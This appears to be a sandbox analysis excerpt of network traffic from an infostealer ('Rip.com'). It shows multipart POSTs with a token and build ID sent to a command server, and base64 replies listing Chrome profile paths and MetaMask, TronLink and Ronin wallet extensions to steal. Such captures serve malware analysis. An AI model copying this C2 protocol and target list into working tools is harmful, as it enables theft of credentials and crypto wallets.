                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      2024-12-31 20:33:25 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                                      Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      4192.168.2.449741116.203.13.1094437816C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:33:26 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----5x47y5pzmglnym79ri58
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                      Host: h7h7h7.online
                                                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      2024-12-31 20:33:26 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 35 78 34 37 79 35 70 7a 6d 67 6c 6e 79 6d 37 39 72 69 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 38 32 36 38 30 62 30 39 33 36 32 31 38 61 36 30 66 66 36 34 37 66 30 62 39 63 38 35 64 62 0d 0a 2d 2d 2d 2d 2d 2d 35 78 34 37 79 35 70 7a 6d 67 6c 6e 79 6d 37 39 72 69 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 35 78 34 37 79 35 70 7a 6d 67 6c 6e 79 6d 37 39 72 69 35 38 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                      Data Ascii: ------5x47y5pzmglnym79ri58Content-Disposition: form-data; name="token"bc82680b0936218a60ff647f0b9c85db------5x47y5pzmglnym79ri58Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------5x47y5pzmglnym79ri58Cont
                                                                                                                                                                                                                                                                      2024-12-31 20:33:26 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 20:33:26 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      2024-12-31 20:33:26 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                      Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      5192.168.2.449742116.203.13.1094437816C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:33:27 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----sj5ph4e3e3oh4ekno8yc
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                      Host: h7h7h7.online
                                                                                                                                                                                                                                                                      Content-Length: 332
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      2024-12-31 20:33:27 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 73 6a 35 70 68 34 65 33 65 33 6f 68 34 65 6b 6e 6f 38 79 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 38 32 36 38 30 62 30 39 33 36 32 31 38 61 36 30 66 66 36 34 37 66 30 62 39 63 38 35 64 62 0d 0a 2d 2d 2d 2d 2d 2d 73 6a 35 70 68 34 65 33 65 33 6f 68 34 65 6b 6e 6f 38 79 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 73 6a 35 70 68 34 65 33 65 33 6f 68 34 65 6b 6e 6f 38 79 63 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                      Data Ascii: ------sj5ph4e3e3oh4ekno8ycContent-Disposition: form-data; name="token"bc82680b0936218a60ff647f0b9c85db------sj5ph4e3e3oh4ekno8ycContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------sj5ph4e3e3oh4ekno8ycCont
                                                                                                                                                                                                                                                                      2024-12-31 20:33:28 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 20:33:28 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      2024-12-31 20:33:28 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      6192.168.2.449743116.203.13.1094437816C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:33:28 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----kng4e3ozmozuaaasj5ph
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                      Host: h7h7h7.online
                                                                                                                                                                                                                                                                      Content-Length: 5965
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      2024-12-31 20:33:28 UTC5965OUTData Raw: 2d 2d 2d 2d 2d 2d 6b 6e 67 34 65 33 6f 7a 6d 6f 7a 75 61 61 61 73 6a 35 70 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 38 32 36 38 30 62 30 39 33 36 32 31 38 61 36 30 66 66 36 34 37 66 30 62 39 63 38 35 64 62 0d 0a 2d 2d 2d 2d 2d 2d 6b 6e 67 34 65 33 6f 7a 6d 6f 7a 75 61 61 61 73 6a 35 70 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 6b 6e 67 34 65 33 6f 7a 6d 6f 7a 75 61 61 61 73 6a 35 70 68 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                      Data Ascii: ------kng4e3ozmozuaaasj5phContent-Disposition: form-data; name="token"bc82680b0936218a60ff647f0b9c85db------kng4e3ozmozuaaasj5phContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------kng4e3ozmozuaaasj5phCont
                                                                                                                                                                                                                                                                      2024-12-31 20:33:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 20:33:29 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      2024-12-31 20:33:29 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      7192.168.2.449744116.203.13.1094437816C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:33:29 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----w4euaaa1vkf37ymycj5f
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                      Host: h7h7h7.online
                                                                                                                                                                                                                                                                      Content-Length: 489
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      2024-12-31 20:33:29 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 77 34 65 75 61 61 61 31 76 6b 66 33 37 79 6d 79 63 6a 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 38 32 36 38 30 62 30 39 33 36 32 31 38 61 36 30 66 66 36 34 37 66 30 62 39 63 38 35 64 62 0d 0a 2d 2d 2d 2d 2d 2d 77 34 65 75 61 61 61 31 76 6b 66 33 37 79 6d 79 63 6a 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 77 34 65 75 61 61 61 31 76 6b 66 33 37 79 6d 79 63 6a 35 66 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                      Data Ascii: ------w4euaaa1vkf37ymycj5fContent-Disposition: form-data; name="token"bc82680b0936218a60ff647f0b9c85db------w4euaaa1vkf37ymycj5fContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------w4euaaa1vkf37ymycj5fCont
                                                                                                                                                                                                                                                                      2024-12-31 20:33:30 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 20:33:30 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      2024-12-31 20:33:30 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      8192.168.2.449750142.250.185.1964437320C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:33:33 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-12-31 20:33:33 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 20:33:33 GMT
                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                      Expires: -1
                                                                                                                                                                                                                                                                      Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                      Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-GYMhJMQkGdanWmW3TbYDOw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      2024-12-31 20:33:33 UTC124INData Raw: 38 66 33 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6e 65 77 20 6c 61 77 73 20 32 30 32 35 20 63 61 6c 69 66 6f 72 6e 69 61 22 2c 22 61 70 70 6c 65 20 69 70 68 6f 6e 65 20 73 65 22 2c 22 68 61 72 72 79 20 70 6f 74 74 65 72 20 64 61 72 6b 20 6c 6f 72 64 22 2c 22 6a 75 6c 69 61 20 67 72 6f 73 73 6f 22 2c 22 70 6f 6c 61 72 20 76 6f 72 74 65 78 20 77 65 61 74 68 65 72 20 66 6f
                                                                                                                                                                                                                                                                      Data Ascii: 8f3)]}'["",["new laws 2025 california","apple iphone se","harry potter dark lord","julia grosso","polar vortex weather fo
                                                                                                                                                                                                                                                                      2024-12-31 20:33:33 UTC1390INData Raw: 72 65 63 61 73 74 22 2c 22 73 70 61 63 65 78 20 72 6f 63 6b 65 74 20 6c 61 75 6e 63 68 20 74 6f 64 61 79 22 2c 22 63 6f 6d 70 75 74 65 72 20 6d 65 6d 6f 72 79 20 73 74 6f 72 61 67 65 20 63 72 6f 73 73 77 6f 72 64 20 63 6c 75 65 22 2c 22 6e 6f 72 77 65 67 69 61 6e 20 63 72 75 69 73 65 20 73 68 69 70 20 6d 61 6e 20 6f 76 65 72 62 6f 61 72 64 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                      Data Ascii: recast","spacex rocket launch today","computer memory storage crossword clue","norwegian cruise ship man overboard"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d
                                                                                                                                                                                                                                                                      2024-12-31 20:33:33 UTC784INData Raw: 47 46 32 62 7a 6c 79 4b 32 39 4f 4d 56 42 50 63 47 6c 59 65 58 70 44 57 6c 68 33 52 6c 64 52 5a 6b 55 7a 4e 32 64 43 59 58 6f 76 61 54 49 76 64 44 63 7a 56 32 52 53 61 32 68 7a 4d 47 46 48 57 57 39 5a 59 6e 5a 4b 65 56 4e 31 51 56 64 56 4f 58 64 6a 52 56 6b 72 62 46 59 35 57 6a 41 32 4e 7a 46 45 65 47 70 6d 4d 6b 5a 75 52 56 70 4d 62 56 4d 32 61 7a 4a 76 5a 55 31 71 63 6a 4d 33 57 57 39 48 63 30 70 78 56 46 67 7a 61 7a 5a 76 55 44 64 73 62 30 4a 44 57 54 46 5a 52 55 6c 47 53 45 4e 71 53 43 39 6a 4d 47 74 73 61 32 74 79 53 48 5a 6f 63 54 4e 4e 56 6e 42 49 5a 48 42 4d 54 54 46 34 53 33 5a 53 65 6d 78 52 62 30 6f 79 4e 32 5a 31 5a 56 42 73 56 47 35 55 4d 44 46 78 4e 48 5a 76 61 32 31 31 52 44 56 45 53 45 78 6f 56 6b 45 30 4e 7a 46 75 54 6b 45 78 5a 46 4e 4a
                                                                                                                                                                                                                                                                      Data Ascii: GF2bzlyK29OMVBPcGlYeXpDWlh3RldRZkUzN2dCYXovaTIvdDczV2RSa2hzMGFHWW9ZYnZKeVN1QVdVOXdjRVkrbFY5WjA2NzFEeGpmMkZuRVpMbVM2azJvZU1qcjM3WW9Hc0pxVFgzazZvUDdsb0JDWTFZRUlGSENqSC9jMGtsa2tySHZocTNNVnBIZHBMTTF4S3ZSemxRb0oyN2Z1ZVBsVG5UMDFxNHZva211RDVESExoVkE0NzFuTkExZFNJ
                                                                                                                                                                                                                                                                      2024-12-31 20:33:33 UTC93INData Raw: 35 37 0d 0a 72 4f 56 6b 79 53 48 68 45 5a 6a 4a 58 63 6e 6b 7a 56 32 77 7a 54 48 64 69 4d 54 68 32 5a 30 45 33 62 45 68 78 52 44 67 72 59 55 70 79 5a 58 4a 52 55 31 4a 48 52 33 6c 5a 4e 31 67 72 54 6e 56 6d 64 48 70 54 55 30 5a 55 61 30 55 35 4e 6e 70 6b 4d 45 4d 30 62 47 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 57rOVkySHhEZjJXcnkzV2wzTHdiMTh2Z0E3bEhxRDgrYUpyZXJRU1JHR3lZN1grTnVmdHpTU0ZUa0U5NnpkMEM0bG
                                                                                                                                                                                                                                                                      2024-12-31 20:33:33 UTC1390INData Raw: 63 39 62 0d 0a 6f 76 55 33 52 6d 64 6d 52 4f 62 58 56 61 63 6c 59 35 61 6a 4e 55 59 6e 42 71 64 45 68 32 54 6d 74 75 4c 30 70 77 62 58 5a 70 4c 31 55 7a 53 54 4d 7a 54 48 46 45 4d 7a 4a 42 61 58 4e 7a 54 57 68 7a 4c 32 6c 71 64 33 5a 33 4d 6d 46 5a 61 54 4e 47 62 46 6c 51 61 47 6c 50 4d 56 4e 56 4e 54 5a 6b 65 6c 46 48 55 46 45 78 54 6b 52 33 54 32 55 78 53 32 67 79 63 55 6c 36 4c 30 5a 71 4e 56 5a 58 55 46 64 71 54 31 4e 34 53 6a 59 77 52 54 6c 68 56 6e 4e 30 61 6c 4a 4b 55 6d 35 72 4d 56 6c 55 62 30 74 42 62 32 38 32 56 56 56 4b 62 58 6c 69 55 47 64 42 62 58 5a 30 4e 56 55 76 56 32 68 55 56 6a 51 33 5a 54 52 79 5a 44 5a 4e 61 58 4a 46 4c 79 38 79 55 54 30 39 4f 68 5a 6f 59 58 4a 79 65 53 42 77 62 33 52 30 5a 58 49 67 5a 47 46 79 61 79 42 73 62 33 4a 6b
                                                                                                                                                                                                                                                                      Data Ascii: c9bovU3RmdmRObXVaclY5ajNUYnBqdEh2TmtuL0pwbXZpL1UzSTMzTHFEMzJBaXNzTWhzL2lqd3Z3MmFZaTNGbFlQaGlPMVNVNTZkelFHUFExTkR3T2UxS2gycUl6L0ZqNVZXUFdqT1N4SjYwRTlhVnN0alJKUm5rMVlUb0tBb282VVVKbXliUGdBbXZ0NVUvV2hUVjQ3ZTRyZDZNaXJFLy8yUT09OhZoYXJyeSBwb3R0ZXIgZGFyayBsb3Jk
                                                                                                                                                                                                                                                                      2024-12-31 20:33:33 UTC1390INData Raw: 6e 59 35 62 54 6b 78 53 6d 49 32 4d 57 4e 68 5a 6a 46 71 5a 45 31 75 4d 45 6b 32 53 44 5a 74 63 6b 74 34 56 44 46 59 55 30 6c 59 54 57 4e 74 63 32 64 43 4e 6d 52 68 56 6b 39 51 56 45 6b 72 61 46 4e 53 59 33 42 56 5a 55 35 46 55 33 67 32 52 44 63 32 4e 30 4e 74 4d 6d 78 4d 61 6e 42 36 55 46 70 4d 59 6e 68 42 62 46 5a 6d 65 45 70 58 4e 30 46 4c 51 33 64 49 63 57 4d 30 4b 31 63 35 52 79 39 77 5a 33 41 35 65 45 73 7a 64 6b 35 58 56 33 64 4b 4e 54 52 58 5a 6d 78 50 51 33 64 6b 55 6a 6c 44 59 57 34 32 59 6e 4a 35 57 47 6c 50 56 6d 68 5a 54 57 64 36 65 58 51 78 63 55 52 6b 59 31 42 4d 5a 56 68 45 57 45 74 4a 61 32 70 4e 54 55 68 75 4d 33 64 4c 54 47 4e 4e 59 56 52 49 59 6e 70 55 55 6a 68 70 62 6a 68 4e 61 6a 64 78 5a 30 46 48 61 30 68 4e 4e 6d 31 70 5a 56 63 35
                                                                                                                                                                                                                                                                      Data Ascii: nY5bTkxSmI2MWNhZjFqZE1uMEk2SDZtckt4VDFYU0lYTWNtc2dCNmRhVk9QVEkraFNSY3BVZU5FU3g2RDc2N0NtMmxManB6UFpMYnhBbFZmeEpXN0FLQ3dIcWM0K1c5Ry9wZ3A5eEszdk5XV3dKNTRXZmxPQ3dkUjlDYW42YnJ5WGlPVmhZTWd6eXQxcURkY1BMZVhEWEtJa2pNTUhuM3dLTGNNYVRIYnpUUjhpbjhNajdxZ0FHa0hNNm1pZVc5
